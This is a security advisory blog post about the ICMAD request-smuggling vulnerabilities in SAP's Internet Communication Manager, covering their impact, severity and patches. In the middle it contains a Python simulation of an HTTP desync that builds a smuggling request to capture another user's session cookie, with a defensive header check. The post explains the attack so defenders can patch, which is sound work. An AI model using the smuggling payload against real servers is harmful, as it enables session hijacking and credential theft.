ICMAD: Critical Vulnerabilities in SAP Business Applications Require Immediate Attention
Update (August 19, 2022): CISA has added the ICMAD vulnerability CVE-2022-22536 to its Known Exploited Vulnerabilities (KEV) catalog.
The Onapsis Research Labs is on a quest to protect the world’s most critical applications at the center of the global economy. We constantly research a wide range of vulnerabilities, exploits, threat actors, and attack methodologies pertaining to business-critical applications such as those from SAP and Oracle. Detailed research by the Onapsis Research Labs throughout 2021 into HTTP Response Smuggling led to the recent discovery of a set of critical vulnerabilities affecting SAP applications that use the SAP Internet Communication Manager (ICM) component, which we have collectively dubbed ICMAD (Internet Communication Manager Advanced Desync). This discovery requires immediate attention from most SAP customers, given the widespread use of the vulnerable component in SAP landscapes around the world.
Download the Report: Onapsis and SAP Partner to Discover and Patch Critical ICMAD Vulnerabilities
The Background
First, a quick summary of the SAP Internet Communication Manager (ICM). The ICM is one of the most important components of an SAP NetWeaver application server. It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet. One of its core purposes is to serve as the SAP HTTP(S) server, which means that this service is always present and exposed by default in SAP NetWeaver Java applications and is a requirement for running web applications on SAP ABAP (e.g., Web Dynpro ABAP). Additionally, the SAP ICM is a building block of the SAP Web Dispatcher, which means that it typically sits between most SAP application servers and their clients (with the “clients” potentially being “the Internet”).
What was discovered? The Onapsis Research Labs identified three severe, network-exploitable vulnerabilities which could lead to full system takeover if leveraged by an attacker. Abusing these vulnerabilities is simple for an attacker: no prior authentication is needed, no preconditions are required, and the payload can be sent over HTTP(S). The worst of these vulnerabilities was given the highest possible CVSSv3 score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
The most critical of the three affects any SAP NetWeaver application (Java or ABAP) that is reachable over HTTP(S), as well as any application sitting behind SAP Web Dispatcher. Examples of potentially vulnerable applications include SAP ERP, SAP Business Suite, SAP S/4HANA, and SAP Enterprise Portal, to name a few.
ICMAD: Critical, Network-Exploitable Vulnerabilities
This set of critical vulnerabilities, namely CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, was discovered and reported to SAP by the Onapsis Research Labs. CVE-2022-22536 scored the highest, with a CVSSv3 of 10.0. It can be abused to compromise any SAP NetWeaver-based Java or ABAP application in its default configuration. What is most troubling is that this can be achieved with a single request through the commonly exposed HTTP(S) service, and no authentication is required.
The Onapsis Research Labs validated that attackers could use these vulnerabilities in the ICM to hijack arbitrary SAP users’ requests (including their sessions) and subsequently take over the SAP application. In addition, using the “HTTP Response Smuggling” techniques first discovered and presented by Onapsis in 2021, attackers could control responses sent by the SAP application and persist the attack. This means that with a single request, an attacker could steal every victim’s session and credentials in plain text and modify the behavior of the application.
CVE-2022-22536 is exploitable when an HTTP(S) proxy sits between clients and the backend SAP system, which is the most common deployment for HTTP(S) access in any productive landscape. The Onapsis Research Labs validated that attackers could also exploit CVE-2022-22532, rated with a CVSSv3 score of 8.1, in the absence of a proxy. Together, the two vulnerabilities make it possible to compromise SAP NetWeaver Java systems whether or not a proxy is in use, so unpatched SAP systems should be considered vulnerable in either topology.
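To make the proxy-in-the-middle scenario concrete, here is an added illustration written for this page; it is not Onapsis code and it does not reproduce the ICM-specific defect, whose parsing details the post does not disclose. It shows the generic HTTP/1.1 “desync” class that ICMAD belongs to: a front-end proxy and a backend that frame the same byte stream by different rules (Content-Length first versus Transfer-Encoding first), so that bytes the proxy forwarded as the tail of one request become the start of a new request on the backend, and the next user’s request line and cookie get absorbed into it. The paths, host name and cookie value are constructed for the example, and the attacker request is syntactically valid HTTP, which is why a signature-matching firewall or IDS has nothing obviously malicious to flag.

```python
# Added illustration (not from the Onapsis post): a front-end proxy and a
# backend that frame the same HTTP/1.1 byte stream by different rules.
# Paths, host name and cookie value below are constructed for the example.

def split_headers(raw: bytes):
    """Return (request_line, {lower-cased name: value}, remaining bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def chunked_body_length(body: bytes) -> int:
    """Bytes consumed by a chunked body, up to and including the zero-size
    chunk and the empty line that terminates the trailer section."""
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            while True:                      # skip any trailer lines
                line_end = body.index(b"\r\n", pos)
                if line_end == pos:          # empty line: end of message
                    return line_end + 2
                pos = line_end + 2
        pos += size + 2                      # chunk data plus its CRLF


def is_ambiguous(headers: dict) -> bool:
    """A request carrying both framing headers is the classic desync seed;
    a hardened front end should reject it rather than pick one."""
    return b"content-length" in headers and b"transfer-encoding" in headers


def frame_requests(stream: bytes, prefer_chunked: bool):
    """Split a stream into (request_line, headers, body) tuples.

    prefer_chunked=True models a parser that honours Transfer-Encoding
    first; False models one that honours Content-Length first.
    """
    requests = []
    rest = stream
    while rest:
        request_line, headers, body = split_headers(rest)
        te = headers.get(b"transfer-encoding", b"").lower()
        if prefer_chunked and b"chunked" in te:
            n = chunked_body_length(body)
        else:
            n = int(headers.get(b"content-length", b"0"))
        requests.append((request_line, headers, body[:n]))
        rest = body[n:]
    return requests


# Constructed traffic: an attacker's request whose Content-Length also
# covers a partial second request, followed by an unrelated user's request.
SMUGGLED_PREFIX = b"GET /hijacked HTTP/1.1\r\nX-Absorb: "
ATTACKER_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: sap.example\r\n"
    b"Content-Length: " + str(len(ATTACKER_BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + ATTACKER_BODY
)
VICTIM = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: sap.example\r\n"
    b"Cookie: SAP_SESSIONID=constructed-value\r\n"
    b"\r\n"
)
STREAM = ATTACKER + VICTIM


def request_lines(stream: bytes, prefer_chunked: bool):
    """Just the request lines each side believes it saw."""
    return [r[0] for r in frame_requests(stream, prefer_chunked)]


if __name__ == "__main__":
    print("proxy   sees:", request_lines(STREAM, prefer_chunked=False))
    print("backend sees:", request_lines(STREAM, prefer_chunked=True))
    hijacked = frame_requests(STREAM, prefer_chunked=True)[1]
    print("backend request 2 now carries the victim's cookie:",
          hijacked[1].get(b"cookie"))
```

The proxy counts two requests (the attacker’s POST and the victim’s GET) and forwards both unchanged. The backend also counts two, but its second one is the attacker’s smuggled `GET /hijacked` with the victim’s request line and session cookie folded into the `X-Absorb` header: the victim’s request has been captured without any byte on the wire being malformed. The `is_ambiguous` check is the cheap front-end defence for this generic class (refuse requests that carry both `Content-Length` and `Transfer-Encoding`); it is not a substitute for the SAP Security Notes, since the ICM defect is not described here in terms of those two headers.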
The Potential Business Impact
What makes these vulnerabilities especially critical for SAP customers is that the issues are present by default in the ICM component (and therefore in SAP NetWeaver, S/4HANA, and SAP Web Dispatcher). Furthermore, a number of other facts magnify the risk:
- Detection: It’s challenging to differentiate a malicious request from a perfectly normal, benign request;
- Impact: Exploiting ICMAD could lead to a full system takeover, as well as other confidentiality, integrity, and availability threats to business-critical SAP applications;
- Exploitation: No prior authentication is required, exploitation is very simple, and no preconditions are necessary; and
- Attack Surface: The payloads can be sent through HTTP(S), affecting a number of core components that are intended to connect SAP systems to the “outside world”.
A single HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for successful exploitation.
Consequently, this makes it easy for attackers to exploit and extremely hard for security technology such as firewalls or IDS/IPS to detect, as the request carries no payload that a signature could match.
Due to the wide range of affected SAP applications, it is easy to project a number of impact scenarios that could challenge, disrupt, or expose an organization, depending on the intentions of the attacking threat actor group. The specific impact will, of course, vary with the affected system(s), but successful exploitation of the vulnerabilities could allow an attacker to perform several malicious actions affecting the enterprise, for example:
- Hijack of user identities, theft of all user credentials and personal information
- Exfiltration of sensitive or confidential corporate information
- Fraudulent transactions and financial harm
- Change of banking details in a financial system of record
- Internal denial of service attack that disrupts critical systems for the business
It’s worth noting that, at many organizations, SAP applications fall under the purview of specific industry and governmental regulations, as well as financial and other compliance requirements. Unfortunately, this means that the mere presence of known vulnerabilities in SAP applications that could allow unauthenticated, unfettered access may constitute a deficiency in IT controls for data privacy (e.g., GDPR), financial reporting (e.g., SOX), or industry-specific regulations (e.g., PCI-DSS). Any enforced controls that are bypassed via exploitation of these vulnerabilities may cause regulatory and compliance deficiencies over critical areas.
With that in mind, it’s worth connecting with internal risk, compliance, and legal teams in your organization regarding specific regulatory and other compliance requirements that may apply to your organization.
Again, we’re talking about the ability of a malicious actor to achieve full system takeover, so the critical severity should not be understated or underestimated, especially considering both the highly sophisticated attacks continuously observed in the wild by the Onapsis Research Labs and the recent research report from Sygnia on Elephant Beetle, a threat actor group that plays a persistent, long attack game, hiding in enterprise infrastructure.
Recommendations from the Onapsis Research Labs
Onapsis and SAP, the global leader in business software, collaborate frequently on security issues and vulnerabilities with the joint objective of securing SAP customers. The Onapsis Research Labs worked in close partnership with the SAP Product Security Response Team (PSRT) to address these issues, providing technical details, proof-of-concept code, and any necessary data to be analyzed by the SAP Security team.
Onapsis would like to extend special thanks to the SAP PSRT for their collaboration and timely response. As a result of this collaboration and the tireless work of the SAP PSRT, SAP was able to release HotNews Security Notes 3123396 and 3123427 as part of their regular monthly Security Patch Day today (February 8, 2022).
Onapsis Research Labs recommends analyzing the impact that the issues described above can have on your landscape (specifically considering if you have SAP systems exposed to the Internet or to untrusted networks) and applying the notes as soon as possible. For additional guidance about available workarounds for these vulnerabilities, SAP customers should check the References and Workarounds section in the corresponding SAP Security Notes.
For our clients, the Onapsis Platform includes vulnerability assessment capabilities, detection rules, and alarms to continuously monitor for malicious activity targeting these specific vulnerabilities as well as thousands of others. Onapsis clients who have Onapsis Assess and/or Onapsis Defend already have scanning, monitoring, and alerting for these vulnerabilities at their disposal as of the publication date of this blog post, with the first release of February 2022 (2.2022.021).
Given the criticality of these vulnerabilities, especially in light of our increasingly interconnected world, Onapsis would like to make sure that every SAP customer has the ability to check to see if they are exposed in order to take steps to protect their business-critical SAP applications. As part of our responsible outreach to the global SAP community, the Onapsis Research Labs have created a free vulnerability scanning tool that will allow any SAP customer to scan for applications across their SAP landscape that are affected by these vulnerabilities.
You can download this free application here.
Closing Thoughts
The aforementioned vulnerabilities present a critical risk to all unprotected SAP applications that are not patched with the corresponding SAP Security Notes. Without taking prompt action to mitigate the risk, it’s possible for an unauthenticated attacker to fully compromise any unpatched SAP system in a simple way.
The vulnerabilities addressed by these notes carry the highest CVSS scores and affect commonly deployed components in multiple, widely deployed SAP products. This is partly because the affected components are, by design, intended to be exposed to the Internet, greatly increasing the risk that any attacker with access to the HTTP(S) port of a Java or ABAP system could take over the application and, in some circumstances, even the host OS.
Threat intelligence from SAP, CISA, and Onapsis has demonstrated that threat actors have the knowledge, the technology, and the sophistication to launch complex attacks directly against business-critical applications such as SAP. Generally, we see attacks begin within 72 hours of the release of an SAP Security Note. (Recently, Onapsis Research Labs saw Log4j attacks occur within 24 hours of the public disclosure, so the window for defense is small.)
These vulnerabilities potentially offer easy ingress for malicious actors. As a result, SAP and Onapsis consider all unpatched SAP applications to be vulnerable. The U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) has issued a Current Activity Alert relating to these vulnerabilities. CISA, SAP, and Onapsis strongly advise all impacted organizations to apply these security notes as soon as possible, prioritizing affected systems exposed to untrusted networks, such as the Internet.
ICMAD Resources
- For a deeper dive into the ICMAD vulnerabilities, download our threat report.
- Watch Now: SAP and Onapsis Executive Briefing on Critical ICMAD Vulnerabilities
- Onapsis Research Labs created a free vulnerability scanning tool that will allow SAP customers to scan for applications across their SAP landscape that are affected by the ICMAD vulnerabilities.
- If you are not an Onapsis customer, or need more information or assistance to respond to this situation, request a security briefing here.